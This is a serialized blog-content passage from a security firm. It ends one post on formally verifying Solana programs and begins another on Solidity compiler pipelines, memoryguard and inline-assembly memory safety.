hildren":35850},{"style":1335},[35851],{"type":33,"value":35606},{"type":27,"tag":207,"props":35853,"children":35854},{"style":238},[35855],{"type":33,"value":1343},{"type":27,"tag":207,"props":35857,"children":35858},{"style":226},[35859],{"type":33,"value":16867},{"type":27,"tag":207,"props":35861,"children":35862},{"style":238},[35863],{"type":33,"value":35619},{"type":27,"tag":207,"props":35865,"children":35866},{"style":4647},[35867],{"type":33,"value":35624},{"type":27,"tag":207,"props":35869,"children":35870},{"class":209,"line":296},[35871],{"type":27,"tag":207,"props":35872,"children":35873},{"emptyLinePlaceholder":19},[35874],{"type":33,"value":2062},{"type":27,"tag":207,"props":35876,"children":35877},{"class":209,"line":445},[35878,35882,35886,35890,35894,35898],{"type":27,"tag":207,"props":35879,"children":35880},{"style":214},[35881],{"type":33,"value":10290},{"type":27,"tag":207,"props":35883,"children":35884},{"style":220},[35885],{"type":33,"value":35643},{"type":27,"tag":207,"props":35887,"children":35888},{"style":226},[35889],{"type":33,"value":229},{"type":27,"tag":207,"props":35891,"children":35892},{"style":226},[35893],{"type":33,"value":32564},{"type":27,"tag":207,"props":35895,"children":35896},{"style":238},[35897],{"type":33,"value":4685},{"type":27,"tag":207,"props":35899,"children":35900},{"style":4647},[35901],{"type":33,"value":35660},{"type":27,"tag":207,"props":35903,"children":35904},{"class":209,"line":867},[35905,35909,35913,35917,35921],{"type":27,"tag":207,"props":35906,"children":35907},{"style":376},[35908],{"type":33,"value":19556},{"type":27,"tag":207,"props":35910,"children":35911},{"style":220},[35912],{"type":33,"value":35643},{"type":27,"tag":207,"props":35914,"children":35915},{"style":226},[35916],{"type":33,"value":10572},{"type":27,"tag":207,"props":35918,"children":35919},{"style":232},[35920],{"type":33,"value":35680},{"type":27,"tag":207,"props":35922,"children":35923},{"style":238},[35924],{"type":33,"value":384},{"type":27,"tag":207,"props":35926,"children":35927},{"class":209,"line":892},[35928,35932,35936,35940,35944,35948,35952],{"type":27,"tag":207,"props":35929,"children":35930},{"style":220},[35931],{"type":33,"value":33451},{"type":27,"tag":207,"props":35933,"children":35934},{"style":226},[35935],{"type":33,"value":1041},{"type":27,"tag":207,"props":35937,"children":35938},{"style":238},[35939],{"type":33,"value":35700},{"type":27,"tag":207,"props":35941,"children":35942},{"style":226},[35943],{"type":33,"value":1041},{"type":27,"tag":207,"props":35945,"children":35946},{"style":1335},[35947],{"type":33,"value":35709},{"type":27,"tag":207,"props":35949,"children":35950},{"style":238},[35951],{"type":33,"value":35714},{"type":27,"tag":207,"props":35953,"children":35954},{"style":4647},[35955],{"type":33,"value":35719},{"type":27,"tag":207,"props":35957,"children":35958},{"class":209,"line":1475},[35959],{"type":27,"tag":207,"props":35960,"children":35961},{"style":238},[35962],{"type":33,"value":10645},{"type":27,"tag":207,"props":35964,"children":35965},{"class":209,"line":2065},[35966],{"type":27,"tag":207,"props":35967,"children":35968},{"emptyLinePlaceholder":19},[35969],{"type":33,"value":2062},{"type":27,"tag":207,"props":35971,"children":35972},{"class":209,"line":2092},[35973],{"type":27,"tag":207,"props":35974,"children":35975},{"style":4647},[35976],{"type":33,"value":35977}," // Enforce invariants at runtime\n",{"type":27,"tag":207,"props":35979,"children":35980},{"class":209,"line":2130},[35981,35985,35989,35993,35997,36001,36005,36009],{"type":27,"tag":207,"props":35982,"children":35983},{"style":1335},[35984],{"type":33,"value":26510},{"type":27,"tag":207,"props":35986,"children":35987},{"style":238},[35988],{"type":33,"value":1343},{"type":27,"tag":207,"props":35990,"children":35991},{"style":220},[35992],{"type":33,"value":27552},{"type":27,"tag":207,"props":35994,"children":35995},{"style":226},[35996],{"type":33,"value":1041},{"type":27,"tag":207,"props":35998,"children":35999},{"style":238},[36000],{"type":33,"value":35700},{"type":27,"tag":207,"props":36002,"children":36003},{"style":226},[36004],{"type":33,"value":1041},{"type":27,"tag":207,"props":36006,"children":36007},{"style":1335},[36008],{"type":33,"value":29050},{"type":27,"tag":207,"props":36010,"children":36011},{"style":238},[36012],{"type":33,"value":22700},{"type":27,"tag":207,"props":36014,"children":36015},{"class":209,"line":2168},[36016],{"type":27,"tag":207,"props":36017,"children":36018},{"emptyLinePlaceholder":19},[36019],{"type":33,"value":2062},{"type":27,"tag":207,"props":36021,"children":36022},{"class":209,"line":4095},[36023,36027],{"type":27,"tag":207,"props":36024,"children":36025},{"style":8920},[36026],{"type":33,"value":21609},{"type":27,"tag":207,"props":36028,"children":36029},{"style":238},[36030],{"type":33,"value":21614},{"type":27,"tag":207,"props":36032,"children":36033},{"class":209,"line":4103},[36034],{"type":27,"tag":207,"props":36035,"children":36036},{"style":238},[36037],{"type":33,"value":451},{"type":27,"tag":36,"props":36039,"children":36040},{},[36041,36043,36048,36050,36055,36057,36062],{"type":33,"value":36042},"Here, we explicitly ",{"type":27,"tag":84,"props":36044,"children":36046},{"className":36045},[],[36047],{"type":33,"value":27255},{"type":33,"value":36049}," that our invariants hold at ",{"type":27,"tag":942,"props":36051,"children":36052},{},[36053],{"type":33,"value":36054},"runtime",{"type":33,"value":36056}," which allows us to be assured that ",{"type":27,"tag":84,"props":36058,"children":36060},{"className":36059},[],[36061],{"type":33,"value":35700},{"type":33,"value":36063}," will not enter a bad state as a result of some unverifiable behavior.",{"type":27,"tag":36,"props":36065,"children":36066},{},[36067],{"type":33,"value":36068},"In general techniques like this can be used to tidy up the loose ends that formal verification may struggle with.",{"type":27,"tag":28,"props":36070,"children":36072},{"id":36071},"challenges-of-formal-verification-on-solana",[36073],{"type":33,"value":36074},"Challenges of formal verification on Solana",{"type":27,"tag":58,"props":36076,"children":36078},{"id":36077},"expensive-computation",[36079],{"type":33,"value":36080},"Expensive computation",{"type":27,"tag":36,"props":36082,"children":36083},{},[36084,36086,36091],{"type":33,"value":36085},"As we started exploring this project, we were hoping to see it work straight out of the box. Unfortunately, that was not the case. Harkening back to our friend ",{"type":27,"tag":942,"props":36087,"children":36088},{},[36089],{"type":33,"value":36090},"path explosion",{"type":33,"value":36092},", it is often the case that bounded model checking just grinds and grinds on the problem and is not able to produce a solution.",{"type":27,"tag":36,"props":36094,"children":36095},{},[36096,36098,36103],{"type":33,"value":36097},"In order to make this technique more widely applicable, we've been developing a runtime SDK layer that is more ",{"type":27,"tag":942,"props":36099,"children":36100},{},[36101],{"type":33,"value":36102},"formal verification friendly",{"type":33,"value":36104},". Specifically our tool will replace certain built-in SDK functions and structures with less expensive ones in the context of symbolic execution.",{"type":27,"tag":36,"props":36106,"children":36107},{},[36108,36110,36115,36117,36122],{"type":33,"value":36109},"For example, when verifying things like the uniqueness of a ",{"type":27,"tag":84,"props":36111,"children":36113},{"className":36112},[],[36114],{"type":33,"value":28670},{"type":33,"value":36116}," in a ",{"type":27,"tag":84,"props":36118,"children":36120},{"className":36119},[],[36121],{"type":33,"value":24484},{"type":33,"value":36123},", the native program may generate extremely large SMT expressions containing nested 32-byte comparisons and binary searches on a vector.",{"type":27,"tag":36,"props":36125,"children":36126},{},[36127,36129,36134,36136,36141,36143,36148,36150,36155,36157,36162,36164,36169],{"type":33,"value":36128},"However, in most cases the properties we are interested in do not require specific search algorithms for the ",{"type":27,"tag":84,"props":36130,"children":36132},{"className":36131},[],[36133],{"type":33,"value":24484},{"type":33,"value":36135}," or a 32-byte ",{"type":27,"tag":84,"props":36137,"children":36139},{"className":36138},[],[36140],{"type":33,"value":28670},{"type":33,"value":36142},". Instead, our tool can substitute in ",{"type":27,"tag":942,"props":36144,"children":36145},{},[36146],{"type":33,"value":36147},"cheaper",{"type":33,"value":36149}," types and functions, such as a 4-byte ",{"type":27,"tag":84,"props":36151,"children":36153},{"className":36152},[],[36154],{"type":33,"value":28670},{"type":33,"value":36156}," struct and a fixed-size, array-backed ",{"type":27,"tag":84,"props":36158,"children":36160},{"className":36159},[],[36161],{"type":33,"value":24484},{"type":33,"value":36163}," implementation. These structures are API-compatible with the native SDK and the changes are functionally invisible to the Solana program we are verifying. However, the generated expressions are ",{"type":27,"tag":942,"props":36165,"children":36166},{},[36167],{"type":33,"value":36168},"much",{"type":33,"value":36170}," simpler and we find that these techniques can greatly accelerate the speed of model-checking.",{"type":27,"tag":36,"props":36172,"children":36173},{},[36174],{"type":33,"value":36175},"It is of key importance that these SDK modifications do not introduce any unsoundness into the model-checking process. We are actively exploring how to do this effectively.",{"type":27,"tag":58,"props":36177,"children":36179},{"id":36178},"runtime-environment",[36180],{"type":33,"value":36181},"Runtime Environment",{"type":27,"tag":36,"props":36183,"children":36184},{},[36185],{"type":33,"value":36186},"While these techniques are quite capable of verifying pure-Rust constructs such as the logical flow of the program, use of Rust types, etc... other aspects of the Solana runtime environment are more difficult to verify.",{"type":27,"tag":36,"props":36188,"children":36189},{},[36190],{"type":33,"value":36191},"For example, a program may resize accounts to store variable amounts of data. These types of custom serialization algorithms require specialized techniques to verify account invariants. For example, a bug with account serialization could undermine \"correct\" account logic.",{"type":27,"tag":36,"props":36193,"children":36194},{},[36195],{"type":33,"value":36196},"Another example is cross-program invocation (CPI). While account data cannot be changed by other programs, when you invoke other instructions it becomes more difficult to verify instruction invariants. An instruction three levels down could fail and cause the whole transaction to revert.",{"type":27,"tag":28,"props":36198,"children":36199},{"id":10112},[36200],{"type":33,"value":10115},{"type":27,"tag":36,"props":36202,"children":36203},{},[36204],{"type":33,"value":36205},"Computer security is far from being a solved problem. Formal verification is a great technique but it is not a magic bullet. While it can help you verify the correctness of your program it won't catch 100% of the bugs. It won't stop you from specifying the wrong invariants or forgetting things, and it can't help you if there is a bug outside of the scope of the model — for example in the runtime or consensus layer.",{"type":27,"tag":36,"props":36207,"children":36208},{},[36209],{"type":33,"value":36210},"Disclaimer out of the way, we believe that formal verification can still be a very useful tool when applied correctly. We've demonstrated that it is possible to automatically prove invariants about Solana programs in a tractable and user-friendly way.",{"type":27,"tag":26063,"props":36212,"children":36213},{},[],{"type":27,"tag":36,"props":36215,"children":36216},{},[36217],{"type":27,"tag":942,"props":36218,"children":36219},{},[36220,36222,36227,36228,36232],{"type":33,"value":36221},"We're excited to keep pushing this research forward and enhance the security of the whole Solana ecosystem. Our tools are still in development but we're interested in working with other teams. If you have a Solana program you want to get formally verified, give us a shout! Fill out ",{"type":27,"tag":47,"props":36223,"children":36225},{"href":26146,"rel":36224},[51],[36226],{"type":33,"value":26150},{"type":33,"value":26152},{"type":27,"tag":47,"props":36229,"children":36230},{"href":26155},[36231],{"type":33,"value":26158},{"type":33,"value":1041},{"type":27,"tag":10127,"props":36234,"children":36235},{},[36236],{"type":33,"value":10131},{"title":7,"searchDepth":244,"depth":244,"links":36238},[36239,36245,36249,36254,36260,36264],{"id":26220,"depth":244,"text":26223,"children":36240},[36241,36242,36243,36244],{"id":26226,"depth":270,"text":26229},{"id":26294,"depth":270,"text":26297},{"id":27175,"depth":270,"text":27178},{"id":27215,"depth":270,"text":27218},{"id":27268,"depth":244,"text":36246,"children":36247},"Specification: How can we describe what we want our program to do?",[36248],{"id":27382,"depth":270,"text":27385},{"id":28742,"depth":244,"text":28745,"children":36250},[36251,36252,36253],{"id":29419,"depth":270,"text":29422},{"id":29704,"depth":270,"text":29707},{"id":29848,"depth":270,"text":29851},{"id":29989,"depth":244,"text":29992,"children":36255},[36256,36257,36258,36259],{"id":30060,"depth":270,"text":30063},{"id":31903,"depth":270,"text":31906},{"id":32705,"depth":270,"text":30052},{"id":35231,"depth":270,"text":30057},{"id":36071,"depth":244,"text":36074,"children":36261},[36262,36263],{"id":36077,"depth":270,"text":36080},{"id":36178,"depth":270,"text":36181},{"id":10112,"depth":244,"text":10115},"content:blog:2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs.md","blog/2023-01-26-formally-verifying-solana-programs",{"_path":36269,"_dir":5,"_draft":6,"_partial":6,"_locale":7,"title":36270,"description":36271,"author":13003,"image":36272,"date":36274,"isFeatured":19,"onBlogPage":19,"tags":36275,"body":36277,"_type":10152,"_id":37691,"_source":10154,"_file":37692,"_stem":37693,"_extension":10157},"/blog/2023-07-28-solidity-compilers-memory-safety","Solidity Compilers: Memory Safety","An exploration into the Solidity compilation pipeline, optimization assumptions, and how it all relates back to memory-safe assembly.",{"src":36273,"height":18,"width":18},"/posts/solidity-compilers-memory-safety/header.jpg","2023-07-28",[11757,36276],"compiler",{"type":24,"children":36278,"toc":37682},[36279,36283,36319,36331,36337,36359,36372,36518,36539,36544,36565,36570,36578,36583,36588,36593,36599,36618,36623,36644,36706,36719,36749,36769,36796,36801,36814,36819,36824,36837,36868,36891,37045,37063,37113,37132,37157,37162,37168,37195,37215,37243,37248,37270,37289,37297,37308,37313,37329,37586,37594,37599,37603,37608,37613,37678],{"type":27,"tag":28,"props":36280,"children":36281},{"id":30},[36282],{"type":33,"value":34},{"type":27,"tag":36,"props":36284,"children":36285},{},[36286,36288,36294,36295,36299,36301,36308,36310,36317],{"type":33,"value":36287},"What does ",{"type":27,"tag":84,"props":36289,"children":36291},{"className":36290},[],[36292],{"type":33,"value":36293},"memory-safe",{"type":33,"value":13740},{"type":27,"tag":942,"props":36296,"children":36297},{},[36298],{"type":33,"value":16564},{"type":33,"value":36300}," mean? What guarantees does Solidity expose when you're dealing with inline assembly? The documentation ",{"type":27,"tag":47,"props":36302,"children":36305},{"href":36303,"rel":36304},"https://docs.soliditylang.org/en/v0.8.20/assembly.html#memory-safety",[51],[36306],{"type":33,"value":36307},"presents some requirements",{"type":33,"value":36309},", but is production code that ",{"type":27,"tag":47,"props":36311,"children":36314},{"href":36312,"rel":36313},"https://github.com/Vectorized/solady/blob/main/src/utils/SafeTransferLib.sol#L165-L166",[51],[36315],{"type":33,"value":36316},"violates these requirements",{"type":33,"value":36318}," necessarily unsafe?",{"type":27,"tag":36,"props":36320,"children":36321},{},[36322,36324,36329],{"type":33,"value":36323},"In this blog post, we present a high-level overview of the Solidity compiler. We'll also dive into the optimization pipeline, language lawyering, and present an argument for what ",{"type":27,"tag":942,"props":36325,"children":36326},{},[36327],{"type":33,"value":36328},"memory-safety",{"type":33,"value":36330}," actually means.",{"type":27,"tag":28,"props":36332,"children":36334},{"id":36333},"compiler-pipeline",[36335],{"type":33,"value":36336},"Compiler Pipeline",{"type":27,"tag":36,"props":36338,"children":36339},{},[36340,36342,36349,36351,36358],{"type":33,"value":36341},"For brevity's sake, we'll only cover the YUL IR Solidity compilation pipeline ",{"type":27,"tag":47,"props":36343,"children":36346},{"href":36344,"rel":36345},"https://blog.soliditylang.org/2022/03/16/solidity-0.8.13-release-announcement/",[51],[36347],{"type":33,"value":36348},"released in v0.8.13",{"type":33,"value":36350},". Compilation happens ",{"type":27,"tag":47,"props":36352,"children":36355},{"href":36353,"rel":36354},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libsolidity/interface/CompilerStack.cpp#L684",[51],[36356],{"type":33,"value":36357},"in two main steps",{"type":33,"value":736},{"type":27,"tag":12719,"props":36360,"children":36361},{},[36362,36367],{"type":27,"tag":1232,"props":36363,"children":36364},{},[36365],{"type":33,"value":36366},"Solidity to YUL IR",{"type":27,"tag":1232,"props":36368,"children":36369},{},[36370],{"type":33,"value":36371},"YUL IR to EVM opcodes",{"type":27,"tag":101,"props":36373,"children":36375},{"className":8877,"code":36374,"language":8876,"meta":7,"style":7}," if (m_viaIR || m_generateIR || m_generateEwasm)\n generateIR(*contract);\n if (m_generateEvmBytecode)\n {\n if (m_viaIR)\n generateEVMFromIR(*contract);\n else\n compileContract(*contract, otherCompilers);\n }\n",[36376],{"type":27,"tag":84,"props":36377,"children":36378},{"__ignoreMap":7},[36379,36409,36430,36442,36450,36462,36482,36490,36511],{"type":27,"tag":207,"props":36380,"children":36381},{"class":209,"line":210},[36382,36386,36391,36395,36400,36404],{"type":27,"tag":207,"props":36383,"children":36384},{"style":376},[36385],{"type":33,"value":19556},{"type":27,"tag":207,"props":36387,"children":36388},{"style":238},[36389],{"type":33,"value":36390}," (m_viaIR ",{"type":27,"tag":207,"props":36392,"children":36393},{"style":226},[36394],{"type":33,"value":29691},{"type":27,"tag":207,"props":36396,"children":36397},{"style":238},[36398],{"type":33,"value":36399}," m_generateIR ",{"type":27,"tag":207,"props":36401,"children":36402},{"style":226},[36403],{"type":33,"value":29691},{"type":27,"tag":207,"props":36405,"children":36406},{"style":238},[36407],{"type":33,"value":36408}," m_generateEwasm)\n",{"type":27,"tag":207,"props":36410,"children":36411},{"class":209,"line":244},[36412,36417,36421,36425],{"type":27,"tag":207,"props":36413,"children":36414},{"style":1335},[36415],{"type":33,"value":36416}," generateIR",{"type":27,"tag":207,"props":36418,"children":36419},{"style":238},[36420],{"type":33,"value":1343},{"type":27,"tag":207,"props":36422,"children":36423},{"style":226},[36424],{"type":33,"value":9286},{"type":27,"tag":207,"props":36426,"children":36427},{"style":238},[36428],{"type":33,"value":36429},"contract);\n",{"type":27,"tag":207,"props":36431,"children":36432},{"class":209,"line":270},[36433,36437],{"type":27,"tag":207,"props":36434,"children":36435},{"style":376},[36436],{"type":33,"value":19556},{"type":27,"tag":207,"props":36438,"children":36439},{"style":238},[36440],{"type":33,"value":36441}," (m_generateEvmBytecode)\n",{"type":27,"tag":207,"props":36443,"children":36444},{"class":209,"line":296},[36445],{"type":27,"tag":207,"props":36446,"children":36447},{"style":238},[36448],{"type":33,"value":36449}," {\n",{"type":27,"tag":207,"props":36451,"children":36452},{"class":209,"line":445},[36453,36457],{"type":27,"tag":207,"props":36454,"children":36455},{"style":376},[36456],{"type":33,"value":10562},{"type":27,"tag":207,"props":36458,"children":36459},{"style":238},[36460],{"type":33,"value":36461}," (m_viaIR)\n",{"type":27,"tag":207,"props":36463,"children":36464},{"class":209,"line":867},[36465,36470,36474,36478],{"type":27,"tag":207,"props":36466,"children":36467},{"style":1335},[36468],{"type":33,"value":36469}," generateEVMFromIR",{"type":27,"tag":207,"props":36471,"children":36472},{"style":238},[36473],{"type":33,"value":1343},{"type":27,"tag":207,"props":36475,"children":36476},{"style":226},[36477],{"type":33,"value":9286},{"type":27,"tag":207,"props":36479,"children":36480},{"style":238},[36481],{"type":33,"value":36429},{"type":27,"tag":207,"props":36483,"children":36484},{"class":209,"line":892},[36485],{"type":27,"tag":207,"props":36486,"children":36487},{"style":376},[36488],{"type":33,"value":36489}," else\n",{"type":27,"tag":207,"props":36491,"children":36492},{"class":209,"line":1475},[36493,36498,36502,36506],{"type":27,"tag":207,"props":36494,"children":36495},{"style":1335},[36496],{"type":33,"value":36497}," compileContract",{"type":27,"tag":207,"props":36499,"children":36500},{"style":238},[36501],{"type":33,"value":1343},{"type":27,"tag":207,"props":36503,"children":36504},{"style":226},[36505],{"type":33,"value":9286},{"type":27,"tag":207,"props":36507,"children":36508},{"style":238},[36509],{"type":33,"value":36510},"contract, otherCompilers);\n",{"type":27,"tag":207,"props":36512,"children":36513},{"class":209,"line":2065},[36514],{"type":27,"tag":207,"props":36515,"children":36516},{"style":238},[36517],{"type":33,"value":10645},{"type":27,"tag":36,"props":36519,"children":36520},{},[36521,36523,36530,36531,36538],{"type":33,"value":36522},"Each step applies its own set of optimizations. The entrypoints are located at ",{"type":27,"tag":47,"props":36524,"children":36527},{"href":36525,"rel":36526},"https://github.com/ethereum/solidity/blob/fd9ac9abed2049a4b8134d39e178275c8aad75b6/libyul/YulStack.cpp#L92",[51],[36528],{"type":33,"value":36529},"YulStack::optimize",{"type":33,"value":1131},{"type":27,"tag":47,"props":36532,"children":36535},{"href":36533,"rel":36534},"https://github.com/ethereum/solidity/blob/4a8d6618f5b398077f694835905f93d0a3890289/libevmasm/Assembly.cpp#L336",[51],[36536],{"type":33,"value":36537},"Assembly::optimize",{"type":33,"value":1041},{"type":27,"tag":36,"props":36540,"children":36541},{},[36542],{"type":33,"value":36543},"In total, there are four steps.",{"type":27,"tag":12719,"props":36545,"children":36546},{},[36547,36551,36556,36560],{"type":27,"tag":1232,"props":36548,"children":36549},{},[36550],{"type":33,"value":36366},{"type":27,"tag":1232,"props":36552,"children":36553},{},[36554],{"type":33,"value":36555},"Optimization of YUL IR",{"type":27,"tag":1232,"props":36557,"children":36558},{},[36559],{"type":33,"value":36371},{"type":27,"tag":1232,"props":36561,"children":36562},{},[36563],{"type":33,"value":36564},"Optimization of EVM opcodes",{"type":27,"tag":36,"props":36566,"children":36567},{},[36568],{"type":33,"value":36569},"As mentioned in the v0.8.13 release post, the YUL optimizer is able to perform much more complex optimizations. Compared to Solidity, YUL contains detailed semantic information and is simpler for optimization passes to reason about than opcodes.",{"type":27,"tag":10222,"props":36571,"children":36572},{},[36573],{"type":27,"tag":36,"props":36574,"children":36575},{},[36576],{"type":33,"value":36577},"The performance of the new pipeline is not yet always superior to the old one, but it can do much higher-level optimization across functions, so please try it out and give us feedback!",{"type":27,"tag":36,"props":36579,"children":36580},{},[36581],{"type":33,"value":36582},"Importantly, each step happens in isolation and retains no information about the previous stage.",{"type":27,"tag":36,"props":36584,"children":36585},{},[36586],{"type":33,"value":36587},"The optimizer cannot change the behavior of the generated IR. This means we don't need to worry about potentially tricky optimizations such as reordering of functions, removal of unused assigns, or moving stack variables to memory.",{"type":27,"tag":36,"props":36589,"children":36590},{},[36591],{"type":33,"value":36592},"When it comes to safety, we need only to consider the IR generation. But what exactly are the guarantees here?",{"type":27,"tag":28,"props":36594,"children":36596},{"id":36595},"guarantees",[36597],{"type":33,"value":36598},"Guarantees",{"type":27,"tag":36,"props":36600,"children":36601},{},[36602,36603,36610,36612,36617],{"type":33,"value":23888},{"type":27,"tag":47,"props":36604,"children":36607},{"href":36605,"rel":36606},"https://docs.soliditylang.org/en/v0.8.20/internals/layout_in_memory.html",[51],[36608],{"type":33,"value":36609},"Solidity memory layout",{"type":33,"value":36611}," exists only at the time of YUL IR generation. The YUL optimizer and later steps has ",{"type":27,"tag":942,"props":36613,"children":36614},{},[36615],{"type":33,"value":36616},"no information about this layout",{"type":33,"value":1041},{"type":27,"tag":36,"props":36619,"children":36620},{},[36621],{"type":33,"value":36622},"What if the optimizer wants to use memory for optimization passes? How does it know what slots are used by the IR generator?",{"type":27,"tag":36,"props":36624,"children":36625},{},[36626,36628,36634,36636,36642],{"type":33,"value":36627},"Introducing ",{"type":27,"tag":84,"props":36629,"children":36631},{"className":36630},[],[36632],{"type":33,"value":36633},"memoryguard",{"type":33,"value":36635},". If you've ever looked at the output of ",{"type":27,"tag":84,"props":36637,"children":36639},{"className":36638},[],[36640],{"type":33,"value":36641},"solc --ir",{"type":33,"value":36643},", this call may be familiar. It's used to initialize the free-memory pointer.",{"type":27,"tag":101,"props":36645,"children":36647},{"className":11758,"code":36646,"language":11757,"meta":7,"style":7}," /// @src 0:26:371 \"contract XXX {...\"\n store(64, memoryguard(0x80))\n",[36648],{"type":27,"tag":84,"props":36649,"children":36650},{"__ignoreMap":7},[36651,36669],{"type":27,"tag":207,"props":36652,"children":36653},{"class":209,"line":210},[36654,36659,36664],{"type":27,"tag":207,"props":36655,"children":36656},{"style":4647},[36657],{"type":33,"value":36658}," /// @src 0:26:371 \"contract ",{"type":27,"tag":207,"props":36660,"children":36661},{"style":214},[36662],{"type":33,"value":36663},"XXX",{"type":27,"tag":207,"props":36665,"children":36666},{"style":4647},[36667],{"type":33,"value":36668}," {...\"\n",{"type":27,"tag":207,"props":36670,"children":36671},{"class":209,"line":244},[36672,36677,36681,36685,36689,36693,36697,36702],{"type":27,"tag":207,"props":36673,"children":36674},{"style":1335},[36675],{"type":33,"value":36676}," store",{"type":27,"tag":207,"props":36678,"children":36679},{"style":238},[36680],{"type":33,"value":1343},{"type":27,"tag":207,"props":36682,"children":36683},{"style":232},[36684],{"type":33,"value":2889},{"type":27,"tag":207,"props":36686,"children":36687},{"style":238},[36688],{"type":33,"value":1123},{"type":27,"tag":207,"props":36690,"children":36691},{"style":1335},[36692],{"type":33,"value":36633},{"type":27,"tag":207,"props":36694,"children":36695},{"style":238},[36696],{"type":33,"value":1343},{"type":27,"tag":207,"props":36698,"children":36699},{"style":232},[36700],{"type":33,"value":36701},"0x80",{"type":27,"tag":207,"props":36703,"children":36704},{"style":238},[36705],{"type":33,"value":26983},{"type":27,"tag":36,"props":36707,"children":36708},{},[36709,36711,36718],{"type":33,"value":36710},"From ",{"type":27,"tag":47,"props":36712,"children":36715},{"href":36713,"rel":36714},"https://solidity.readthedocs.io/en/latest/yul.html#memoryguard",[51],[36716],{"type":33,"value":36717},"the documentation",{"type":33,"value":11407},{"type":27,"tag":10222,"props":36720,"children":36721},{},[36722],{"type":27,"tag":36,"props":36723,"children":36724},{},[36725,36727,36733,36735,36741,36743,36748],{"type":33,"value":36726},"The caller of ",{"type":27,"tag":84,"props":36728,"children":36730},{"className":36729},[],[36731],{"type":33,"value":36732},"let ptr := memoryguard(size)",{"type":33,"value":36734}," (where size has to be a literal number) promises that they only use memory in either the range ",{"type":27,"tag":84,"props":36736,"children":36738},{"className":36737},[],[36739],{"type":33,"value":36740},"[0, size)",{"type":33,"value":36742}," or the unbounded range starting at ",{"type":27,"tag":84,"props":36744,"children":36746},{"className":36745},[],[36747],{"type":33,"value":21225},{"type":33,"value":1041},{"type":27,"tag":36,"props":36750,"children":36751},{},[36752,36754,36759,36761,36767],{"type":33,"value":36753},"For example, if the YUL optimizer needs 32 bytes of memory, it can have ",{"type":27,"tag":84,"props":36755,"children":36757},{"className":36756},[],[36758],{"type":33,"value":36633},{"type":33,"value":36760}," return ",{"type":27,"tag":84,"props":36762,"children":36764},{"className":36763},[],[36765],{"type":33,"value":36766},"size + 32",{"type":33,"value":36768},". The optimizer gets a guaranteed region of memory which will not be touched!",{"type":27,"tag":36,"props":36770,"children":36771},{},[36772,36774,36781,36783,36788,36790,36795],{"type":33,"value":36773},"An example of this optimization in practice ",{"type":27,"tag":47,"props":36775,"children":36778},{"href":36776,"rel":36777},"https://github.com/ethereum/solidity/blob/1633e367c90aed7a6a14d84e2c288e6a8ab93304/libyul/optimiser/StackLimitEvader.cpp",[51],[36779],{"type":33,"value":36780},"is the StackLimitEvader",{"type":33,"value":36782},", which moves variables from the stack into memory. Incidentally, this is also currently the ",{"type":27,"tag":942,"props":36784,"children":36785},{},[36786],{"type":33,"value":36787},"only",{"type":33,"value":36789}," optimization pass that relies on the semantic information communicated by ",{"type":27,"tag":84,"props":36791,"children":36793},{"className":36792},[],[36794],{"type":33,"value":36633},{"type":33,"value":1041},{"type":27,"tag":36,"props":36797,"children":36798},{},[36799],{"type":33,"value":36800},"The modular design between different compiler stages also means that we're not tied down into any particular memory layout. Does it make sense to waste an entire memory word on the free memory pointer? Maybe not for some applications.",{"type":27,"tag":36,"props":36802,"children":36803},{},[36804,36806,36812],{"type":33,"value":36805},"Fear not, for we can remove this pointer entirely and call ",{"type":27,"tag":84,"props":36807,"children":36809},{"className":36808},[],[36810],{"type":33,"value":36811},"memoryguard(0x60)",{"type":33,"value":36813}," instead. The rest of the pipeline will still work.",{"type":27,"tag":28,"props":36815,"children":36816},{"id":36328},[36817],{"type":33,"value":36818},"Memory Safety",{"type":27,"tag":36,"props":36820,"children":36821},{},[36822],{"type":33,"value":36823},"So what does memory safety mean?",{"type":27,"tag":36,"props":36825,"children":36826},{},[36827,36829,36835],{"type":33,"value":36828},"The Solidity documentation provides ",{"type":27,"tag":47,"props":36830,"children":36832},{"href":36303,"rel":36831},[51],[36833],{"type":33,"value":36834},"a set of constraints",{"type":33,"value":36836},", not a definition.",{"type":27,"tag":10222,"props":36838,"children":36839},{},[36840,36845],{"type":27,"tag":36,"props":36841,"children":36842},{},[36843],{"type":33,"value":36844},"In particular, a memory-safe assembly block may only access the following memory ranges:",{"type":27,"tag":12719,"props":36846,"children":36847},{},[36848,36853,36858,36863],{"type":27,"tag":1232,"props":36849,"children":36850},{},[36851],{"type":33,"value":36852},"Memory allocated by yourself using a mechanism like the allocate function described above.",{"type":27,"tag":1232,"props":36854,"children":36855},{},[36856],{"type":33,"value":36857},"Memory allocated by Solidity, e.g. memory within the bounds of a memory array you reference.",{"type":27,"tag":1232,"props":36859,"children":36860},{},[36861],{"type":33,"value":36862},"The scratch space between memory offset 0 and 64 mentioned above.",{"type":27,"tag":1232,"props":36864,"children":36865},{},[36866],{"type":33,"value":36867},"Temporary memory that is located after the value of the free memory pointer at the beginning of the assembly\nblock, i.e. memory that is “allocated” at the free memory pointer without updating the free memory pointer.",{"type":27,"tag":36,"props":36869,"children":36870},{},[36871,36873,36880,36890],{"type":33,"value":36872},"Looking to the compiler, it appears the presence of memory-unsafe assembly ",{"type":27,"tag":47,"props":36874,"children":36877},{"href":36875,"rel":36876},"https://github.com/ethereum/solidity/blob/a297a687261a1c634551b1dac0e36d4573c19afe/libsolidity/codegen/ir/IRGenerator.cpp#L210",[51],[36878],{"type":33,"value":36879},"removes the memory guard",{"type":27,"tag":22749,"props":36881,"children":36882},{},[36883],{"type":27,"tag":47,"props":36884,"children":36888},{"href":36885,"ariaDescribedBy":36886,"dataFootnoteRef":7,"id":36887},"#user-content-fn-1",[22756],"user-content-fnref-1",[36889],{"type":33,"value":1651},{"type":33,"value":1041},{"type":27,"tag":101,"props":36892,"children":36894},{"className":8877,"code":36893,"language":8876,"meta":7,"style":7},"// bool creationInvolvesMemoryUnsafeAssembly = m_context.memoryUnsafeInlineAssemblySeen();\n// t(\"memoryInitCreation\", memoryInit(!creationInvolvesMemoryUnsafeAssembly));\n\nstring IRGenerator::memoryInit(bool _useMemoryGuard)\n{\n // This function should be called at the beginning of the EVM call frame\n // and thus can assume all memory to be zero, including the contents of\n // the \"zero memory area\" (the position CompilerUtils::zeroPointer points to).\n return\n Whiskers{\n _useMemoryGuard ?\n \"mstore(\u003CmemPtr>, memoryguard(\u003CfreeMemoryStart>))\" :\n \"mstore(\u003CmemPtr>, \u003CfreeMemoryStart>)\"\n 